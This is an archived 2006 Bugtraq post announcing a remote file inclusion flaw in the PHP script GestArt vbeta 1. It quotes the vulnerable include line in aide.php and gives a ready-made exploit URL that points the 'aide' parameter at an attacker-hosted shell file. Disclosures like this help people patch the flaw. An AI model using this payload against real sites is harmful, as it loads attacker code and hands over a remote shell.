lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20061026023151.21644.qmail@securityfocus.com> Date: 26 Oct 2006 02:31:51 -0000 From: ip.123.456.78.90@...mail.com To: bugtraq@...urityfocus.com Subject: GestArt <= vbeta 1 Remote File Include Vulnerabilities GestArt <= vbeta 1 Remote File Include Vulnerabilities Found By : CoLd Zero [ Wasem898 ] Palestine Muslim Hacker's Code : include("$4AZHAR.Team") ###################################################### # # [ GestArt vbeta 1] # # Class: Remote File Include Vulnerabilities # Published 2006-10-25 # Remote: Yes # Critical Level : Dangerous # Site: http://www.comscripts.com/scripts/php.gestart.642.html # Author: Cold Zero # Contact: ip.123.456.78.90@...mail.com # ###################################################### file ; /gestArt/aide.php ====================================================== Vuln Code: <? include("$aide.txt");?> ======================================================= Exploit : Http:// www.Victem.0 / [WM-News_path[ /gestArt/aide.php3?aide=http://ColdZero-Shell.txt? ---- Thanx: [MoHaNdKo] [Cold ThreE] [Viper Hacker] [Root Shell] [o0xxdark0o] ]organza[ [Huge] [H@...T] ---- GreeTz: All www.4azhar.Com Members Cont : ip.123.456.78.90@...mail.com Station : WWW.4AZHAR.COM --------------------------------------|| Viva Palestine ||-----------------------------------------